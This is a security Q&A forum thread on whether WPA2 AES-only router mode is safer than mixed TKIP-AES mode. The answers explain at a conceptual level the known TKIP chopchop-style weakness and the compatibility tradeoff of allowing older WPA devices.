1

On this forum thread I see (translated):

On Telecom Router we have those wifi encryption modes

Disabled-OpenNet

- WEP (128 bit) -> WEP (unsafe breakable in some minutes)

- WPA-PSK TKIP 256 bit -> WPA (unsafe breakable in some hours)

- WPA-PSK AES 256 bit -> WPA2 (safe)

- WPA-PSK TKIP-AES 256 bit -> WPA\WPA2 (unsafe)

Is WPA-PSK AES safer than WPA-PSK TKIP-AES? Is WPA-PSK TKIP-AES dangerous for security?

schroeder
  • 123,438
  • 55
  • 284
  • 319
elbarna
  • 113
  • 1
  • 4

2 Answers2

7

TKIP is vulnerable to an attack similar to the WEP "ChopChop" attack.

TKIP uses MIC for guaranteeing the integrity of an encrypted frame. If more than two MIC failures are observed in a 60 second window, both the Access Point (AP) and client station shut down for 60 seconds. The newer TKIP attack uses a mechanism similar to the “chopchop” WEP attack to decode one byte at a time by using multiple replays and observing the response over the air. When a MIC failure occurs, the attacker can observe the response and waits for 60 seconds to avoid MIC countermeasures. Using the mechanism, the attacker can decode a packet at the rate of one byte per minute. Small packets like ARP frames can typically be decoded in about 15 minutes by leveraging this exploit.

TKIP also includes a sequence counter that could detect if a packet is being sent out of sequence. However, with the introduction of QoS based on the WMM standard, the sequence enforcement across multiple QoS queues was relaxed for performance reasons. This creates another security flaw. Once a TKIP frame has been decoded, the attacker can use the obtained key sequence to further inject up to 15 additional arbitrary frames using different QoS queues without triggering a sequence number violation that would have lead to the injected packet being dropped.

Summary of TKIP Vulnerabilities

  1. This is not a key recovery attack. TKIP keys are not compromised and it does not lead to decryption of all subsequent frames.

  2. The attack affects all TKIP deployments (WPA and WPA2) regardless of whether they use Pre-Shared Keys (PSK) or the more robust enterprise mode with 802.1x authentication.

  3. The attack can reveal one byte per minute of a TKIP encrypted packet. Small frames like ARPs are good candidates for the attack.

  4. If QoS is enabled, the attack can also lead to injection of up to 15 arbitrary frames for every decrypted packet. Potential attack scenarios include ARP decoding followed by ARP poisoning, DNS manipulation, etc.
  5. WPA and WPA2 networks that use the more robust AES-CCMP encryption algorithm are immune to the attack.
  6. The attack is capable of decrypting a TKIP frame sent from an AP to a station (not station to AP).
Yokai
  • 795
  • 4
  • 7
4

As described, the disadvantage to allowing TKIP (also known as WPA) is that there is a known weakness. AES (used in WPA2) is more robust. Setting it to a mode that allows both will allow older devices that don't support WPA2 to connect in WPA mode, while devices that do support WPA2 will use that instead. Setting it to AES only comes at the price of rejecting any clients that support just WPA.

The ultimate security risk is that an older device will connect, and traffic will be intercepted and used to determine the encryption key and can then eavesdrop on the activity.

Jeff Meden
  • 3,966
  • 13
  • 16